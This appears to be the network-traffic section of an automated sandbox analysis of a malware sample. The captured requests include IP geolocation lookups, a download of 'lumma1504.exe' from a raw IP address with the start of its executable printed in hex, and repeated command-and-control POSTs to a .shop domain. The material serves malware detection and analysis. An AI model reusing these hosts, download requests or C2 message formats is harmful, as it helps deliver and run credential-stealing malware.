                                                                                                                                            Apr 21, 2024 15:31:20.586831093 CEST192.168.2.41.1.1.10x1d46Standard query (0)bordersoarmanusjuw.shopA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Apr 21, 2024 15:31:12.054332972 CEST1.1.1.1192.168.2.40x82faNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:12.710485935 CEST1.1.1.1192.168.2.40xca8dNo error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:12.710485935 CEST1.1.1.1192.168.2.40xca8dNo error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:12.710485935 CEST1.1.1.1192.168.2.40xca8dNo error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:20.719496965 CEST1.1.1.1192.168.2.40x1d46No error (0)bordersoarmanusjuw.shop172.67.189.66A (IP address)IN (0x0001)false
                                                                                                                                            Apr 21, 2024 15:31:20.719496965 CEST1.1.1.1192.168.2.40x1d46No error (0)bordersoarmanusjuw.shop104.21.9.123A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • https:
                                                                                                                                              • ipinfo.io
                                                                                                                                            • db-ip.com
                                                                                                                                            • bordersoarmanusjuw.shop
                                                                                                                                            • 193.233.132.253

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449740193.233.132.253806736C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Apr 21, 2024 15:31:18.443950891 CEST223OUTHEAD /lumma1504.exe HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                                                                                                            Host: 193.233.132.253
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Apr 21, 2024 15:31:18.696966887 CEST155INHTTP/1.1 200 OK
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 315904
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:18 GMT
                                                                                                                                            Server: Python/3.10 aiohttp/3.8.6
                                                                                                                                            Apr 21, 2024 15:31:18.698138952 CEST222OUTGET /lumma1504.exe HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                                                                                                            Host: 193.233.132.253
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Apr 21, 2024 15:31:18.947947979 CEST155INHTTP/1.1 200 OK
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 315904
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:18 GMT
                                                                                                                                            Server: Python/3.10 aiohttp/3.8.6
                                                                                                                                            Apr 21, 2024 15:31:18.948599100 CEST1289INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5"0~2 @ @`
                                                                                                                                            Apr 21, 2024 15:31:18.948612928 CEST1289INData Raw: 03 3f c0 fe ff ff 2a 01 10 00 00 00 00 08 00 38 40 00 01 14 00 00 01 1e 73 0d 00 00 06 26 2a 1e 02 28 15 00 00 0a 2a 36 02 28 15 00 00 0a 02 28 0e 00 00 06 2a 00 00 1b 30 07 00 71 00 00 00 04 00 00 11 16 0a 7f 01 00 00 04 7e 01 00 00 04 8e 69 28
                                                                                                                                            Data Ascii: ?*8@s&*(*6((*0q~i(s~~o~~i@(& ~~((&z*oo(*%( %
                                                                                                                                            Apr 21, 2024 15:31:18.948717117 CEST1289INData Raw: 83 00 66 02 2e 00 0b 00 5a 01 2e 00 13 00 63 01 2e 00 1b 00 82 01 2e 00 23 00 8b 01 2e 00 2b 00 a9 01 2e 00 33 00 a9 01 2e 00 3b 00 a9 01 2e 00 43 00 af 01 2e 00 4b 00 c9 01 2e 00 53 00 a9 01 2e 00 5b 00 a9 01 2e 00 63 00 e1 01 2e 00 6b 00 0b 02
                                                                                                                                            Data Ascii: f.Z.c..#.+.3.;.C.K.S.[.c.k.sfa ALR9@x@28X
                                                                                                                                            Apr 21, 2024 15:31:18.948729992 CEST1289INData Raw: 53 74 72 69 6e 67 00 6b 6d 76 6f 53 6e 63 69 00 53 75 70 65 72 42 6f 6f 6b 00 45 78 70 6c 69 63 69 74 45 74 65 72 6e 61 6c 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 50 72 6f 67 72 61 6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 53 65 63 75 72 69 74
                                                                                                                                            Data Ascii: StringkmvoSnciSuperBookExplicitEternalkernel32.dllProgramSystemMainSecurityActionSystem.ReflectionExceptionQuestionAsjbcbxAUiaoIOasuoihciujoAngelocnxnUIAuwBuwwqqaddruserBuffer.ctor.cctorAScsrhgtrSystem.DiagnosticsSystem.R
                                                                                                                                            Apr 21, 2024 15:31:18.948740005 CEST1289INData Raw: 69 6f 6e 2e 70 64 62 00 54 32 00 00 00 00 00 00 00 00 00 00 6e 32 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 32 00 00 00 00 00 00 00 00 00 00 00 00 5f 43 6f 72 45 78 65 4d 61 69 6e 00 6d 73 63 6f 72 65 65 2e
                                                                                                                                            Data Ascii: ion.pdbT2n2 `2_CorExeMainmscoree.dll% @OmIDD/Y3BauRF3mH!]YUixqeu "zVonfJAN'9C^s[cRGIB5;?e
                                                                                                                                            Apr 21, 2024 15:31:18.948750973 CEST1289INData Raw: 69 76 2b 7f 46 3a 7d 88 75 eb d2 ca 54 4a a3 49 3a 1b e0 d5 65 01 17 c0 59 38 69 b0 f5 ff be 8d 21 51 90 c7 b1 47 09 6a a4 37 cf 58 1a 73 61 c4 6b ec 62 26 e7 f9 ea bd dd f0 99 dd 54 ed 8b cf 0a 36 fd 8c a6 c2 40 30 ad 98 81 c5 67 1c 8c f0 60 2d
                                                                                                                                            Data Ascii: iv+F:}uTJI:eY8i!QGj7Xsakb&T6@0g`-SN>)j_vx&qzchs^igyw[w/-4"Gpkbxn_'zs^&Qn-N~"O3JN%:t<jc&,E, jMeA+4f
                                                                                                                                            Apr 21, 2024 15:31:18.948760986 CEST1289INData Raw: 3c ed 42 13 de 73 d8 24 8b b9 d9 3b 57 fe ce d5 e5 5d 9c 14 6f 96 29 07 89 24 e8 20 f3 fe ce 5d a5 58 69 ef e4 f9 9c 44 3d 14 ac 6a 75 c0 9e d2 8c a0 b4 d0 6a 19 95 fe ac 94 49 8e 20 d0 ab ef f6 35 70 08 3c da a0 e5 9e 2e c9 05 22 11 10 cb 45 6a
                                                                                                                                            Data Ascii: <Bs$;W]o)$ ]XiD=jujI 5p<."EjMOD``&ba}w#4/5z<UQk,~EaOl=,F9e!QmqI# drh3}qsj^<U5&Of0qn/Fx>tQvn+
                                                                                                                                            Apr 21, 2024 15:31:18.948770046 CEST1289INData Raw: 49 59 71 fe b0 b0 e9 65 55 15 69 23 bf 8f 3a 49 a3 b5 f6 dc 2a fe 4d ef 79 ed b2 25 89 2c ae f1 f2 55 fc 48 ba 64 97 4e 6c a6 77 aa 58 85 d0 21 3c 08 ed 5b b4 e3 b2 41 d6 ef a5 d1 bd ab 18 b8 b1 38 6d 37 97 f4 8f fb 8a 8a 42 46 31 15 ec 4b 5f 30
                                                                                                                                            Data Ascii: IYqeUi#:I*My%,UHdNlwX!<[A8m7BF1K_0&My&m<>_\_Eh|P)N1/{e/0>|#nEOr^}{0Z`}f-7b;H/%ri}8+{Y
                                                                                                                                            Apr 21, 2024 15:31:18.948781013 CEST1289INData Raw: 4c 01 e1 21 ab 20 af 99 ab 2f 3a 31 eb 33 8a 3c 70 65 e6 57 44 64 40 8e 94 e0 44 01 87 1d de e4 27 34 6d 7e ea 49 78 9e e8 1e f4 66 dd 63 e6 39 4b fd 52 ed da 2b e7 88 4e d9 3a 54 0c 13 12 c3 a7 2a 7d 9c 88 39 89 e1 ab 2d 5b 45 c4 51 95 48 c1 69
                                                                                                                                            Data Ascii: L! /:13<peWDd@D'4m~Ixfc9KR+N:T*}9-[EQHi & `HrR)<~9X"Il6x?Mg&#UqOnu%%C("sm7'(9pxgs4:Zye(Pzg4v-Ddx?U'S.:oq2uB
                                                                                                                                            Apr 21, 2024 15:31:18.948790073 CEST1289INData Raw: 30 e6 ff 10 8b 37 d5 35 d1 93 8a 35 00 e7 63 5b 99 91 b4 b8 d5 2c 41 7e 48 af 4a cf 54 0e 08 3c f0 45 e5 fe ec 46 90 1e 9d 22 e5 b1 fd 81 61 b4 51 98 14 27 e8 fa 51 8d 2f 2a ca d5 75 ca 93 1d 0c f7 99 6b d2 7e 0a 81 aa 07 e5 f0 ff 1f 6a a4 11 81
                                                                                                                                            Data Ascii: 0755c[,A~HJT<EF"aQ'Q/*uk~jN*g"ylYAk9G*4x];%6#H*QQHK81p^f2c0A}{VW~L[`CVwb,'Ss]z!qRVcj2SMnr1


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.44973334.117.186.1924436736C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:12 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Referer: https://ipinfo.io/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                                                                            Host: ipinfo.io
                                                                                                                                            2024-04-21 13:31:12 UTC513INHTTP/1.1 200 OK
                                                                                                                                            server: nginx/1.24.0
                                                                                                                                            date: Sun, 21 Apr 2024 13:31:12 GMT
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            Content-Length: 980
                                                                                                                                            access-control-allow-origin: *
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                            x-envoy-upstream-service-time: 4
                                                                                                                                            via: 1.1 google
                                                                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Connection: close
                                                                                                                                            2024-04-21 13:31:12 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                            Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                            2024-04-21 13:31:12 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                            Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449734104.26.5.154436736C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:12 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                                                                            Host: db-ip.com
                                                                                                                                            2024-04-21 13:31:13 UTC656INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:13 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            x-iplb-request-id: AC4546BA:D98C_93878F2E:0050_66251521_92C0CEE:4F34
                                                                                                                                            x-iplb-instance: 59215
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDJpV0sjkY%2F1TjVMocAMLJ%2F8Ut9sq3KJUiX0%2BRDGPZsMaZy0ZSRgGVrrKcQ2GPwuwNK2lwKBsV2IMw8vIDvPqAC3zOnxlpqY8%2Bwtcit7ufUZjAvuNEl96Igkiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbaf08cf44dd-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:13 UTC699INData Raw: 32 62 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a
                                                                                                                                            Data Ascii: 2b4{"status":"ok","demoInfo":{"ipAddress":"81.181.57.52","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":
                                                                                                                                            2024-04-21 13:31:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449742172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:20 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:21 UTC822INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:21 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6j0i928ois2qt1ksnh8v0jnsft; expires=Thu, 15-Aug-2024 07:18:00 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqNzA1f1J3l1%2FIph%2B6iFHGlH2L3KrtZV%2B9lF%2FK7fyQ0EqYJUo9HRYNpb%2FDhacB6bcHTy%2BANhvq3ZVGKQKTq4JHsS%2FwWlOcJNX6YMCaNcAk3eHZA8s1tfqIxZayr8JfW7shT5%2F3dsgdD9PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe12e6053d8-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449743172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:21 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:22 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=fahfug7sf4pd76eu7h0sgcbvsd; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxDe2B1skry%2BQYr%2F4aIAZpaqexJ39OIf2P5BMqtT%2B7DJdr9uc3rZ9ZIk6tKpfgj656Bl8bmnhxPlisQt%2FIgMWQJwc9TyHIOrgacZhoKeljkl%2BqP0jbFtd5vm%2BmJPdxXgHuCjJ4J3vQDSkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe4f98d7bb1-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.449745172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:21 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:22 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=uhr0ep1j0rrojkcrmphlhtnmnm; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66b0lNnNs4iqCx2cgcmJ%2BygARvF%2Ftk%2FjJaqxgyR9W9FwZEsmTTDy8RB6O7bMe3iOwr7XLsH1ID91unV1YMuCt7zjIGKFHKT2eatUWyVdoTRS1nBJM6En3dUK8o1KagAmyfqRBlE1ycDgTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe5fede44d5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC557INData Raw: 31 66 64 34 0d 0a 45 35 54 7a 39 51 4f 44 75 6f 41 49 69 4d 62 39 6b 50 72 74 7a 4f 34 51 41 47 33 6b 72 53 62 67 57 32 4d 70 69 54 47 47 78 49 70 6f 6e 76 72 58 64 61 47 41 6f 44 79 6b 7a 50 53 79 69 59 6a 75 31 44 42 30 48 35 48 49 43 75 70 53 51 55 6a 74 45 37 7a 6b 37 48 4c 34 67 4a 41 76 69 62 4f 69 5a 66 44 6b 78 37 43 68 35 38 57 56 47 67 6c 6b 78 73 68 49 77 6d 46 44 43 2f 35 55 35 4b 48 79 5a 2f 47 64 68 6d 72 73 31 4d 42 6c 37 62 4b 63 2f 5a 75 65 70 38 42 35 62 30 2f 49 70 79 2f 70 65 51 5a 54 71 77 75 6d 35 73 64 32 34 4a 4b 34 59 76 44 52 6f 69 53 43 7a 2f 53 79 6e 35 6e 75 31 44 41 69 4d 63 62 64 52 35 49 36 44 6c 72 56 45 37 79 2f 31 6a 48 39 68 35 42 78 34 73 37 70 5a 2b 61 31 6f 62 4c 41 32 2f 7a 65 49 44 42 64 6d 59 38 73 36 53 5a 70 49
                                                                                                                                            Data Ascii: 1fd4E5Tz9QODuoAIiMb9kPrtzO4QAG3krSbgW2MpiTGGxIponvrXdaGAoDykzPSyiYju1DB0H5HICupSQUjtE7zk7HL4gJAvibOiZfDkx7Ch58WVGglkxshIwmFDC/5U5KHyZ/Gdhmrs1MBl7bKc/Zuep8B5b0/Ipy/peQZTqwum5sd24JK4YvDRoiSCz/Syn5nu1DAiMcbdR5I6DlrVE7y/1jH9h5Bx4s7pZ+a1obLA2/zeIDBdmY8s6SZpI
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 50 35 75 39 39 74 73 6e 56 49 65 66 57 34 32 66 71 74 70 66 35 6b 34 71 38 68 33 74 76 41 6f 62 43 54 6f 30 36 41 55 7a 68 57 65 75 73 37 48 7a 37 6c 35 64 68 6f 5a 61 4b 41 59 48 6b 6d 4f 72 59 31 2b 7a 4d 55 57 63 66 67 63 4e 53 77 41 4e 42 49 34 42 4d 71 73 32 71 4d 35 37 36 6a 67 6d 4b 73 36 4a 74 35 75 54 48 73 4e 69 48 71 34 39 78 61 51 43 46 78 30 2b 51 4f 52 4e 4e 35 6c 62 32 6f 4f 31 2f 2f 4a 4b 46 61 2b 2f 65 34 57 50 68 72 5a 72 31 6e 4d 2f 67 35 42 6b 4a 54 34 48 58 42 4e 70 37 51 57 72 6d 57 4f 69 73 2f 33 47 32 2b 66 78 2b 72 37 43 4a 63 34 4c 50 39 4c 4b 66 67 2b 37 55 4d 43 49 4c 68 38 74 46 68 6a 63 50 54 2b 64 56 36 71 76 6e 64 2f 79 52 6b 47 76 70 30 4f 4e 6e 34 61 75 66 39 35 57 4c 71 49 42 7a 5a 30 2f 49 70 79 2f 70 65 51 5a 54 71 77
                                                                                                                                            Data Ascii: P5u99tsnVIefW42fqtpf5k4q8h3tvAobCTo06AUzhWeus7Hz7l5dhoZaKAYHkmOrY1+zMUWcfgcNSwANBI4BMqs2qM576jgmKs6Jt5uTHsNiHq49xaQCFx0+QORNN5lb2oO1//JKFa+/e4WPhrZr1nM/g5BkJT4HXBNp7QWrmWOis/3G2+fx+r7CJc4LP9LKfg+7UMCILh8tFhjcPT+dV6qvnd/yRkGvp0ONn4auf95WLqIBzZ0/Ipy/peQZTqw
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 66 75 53 62 6d 32 44 7a 33 2b 74 6a 34 4b 57 52 2f 5a 4f 44 71 35 35 35 62 51 65 4a 7a 6b 6d 50 4d 67 56 4c 71 78 32 4d 7a 59 4d 78 38 59 6e 58 4f 61 4f 59 77 32 66 6c 74 70 7a 6a 32 72 71 74 67 6e 78 6c 47 63 61 6e 4c 35 31 33 61 53 44 79 4f 34 2f 4e 71 48 62 36 30 63 38 6a 6f 64 6e 75 5a 75 75 72 6d 66 69 51 6a 4b 2b 65 65 32 30 48 69 63 5a 46 67 54 30 41 51 66 6c 42 35 4b 72 36 66 66 79 58 6d 47 7a 74 6d 4b 77 43 67 63 2f 66 39 59 44 50 39 73 34 79 53 41 79 53 7a 45 37 41 44 41 4a 46 35 56 54 79 35 6f 41 61 36 64 2f 2f 43 76 69 77 69 51 47 71 6f 35 4f 79 77 4d 33 75 67 58 4e 71 43 5a 54 41 53 59 45 33 44 30 54 75 58 4f 79 6d 36 48 7a 7a 6c 5a 78 71 34 74 58 6d 65 4f 43 6b 6c 2f 65 5a 68 61 54 4d 50 41 70 6b 37 59 39 44 6d 6e 6c 5a 43 61 74 69 38 36 32
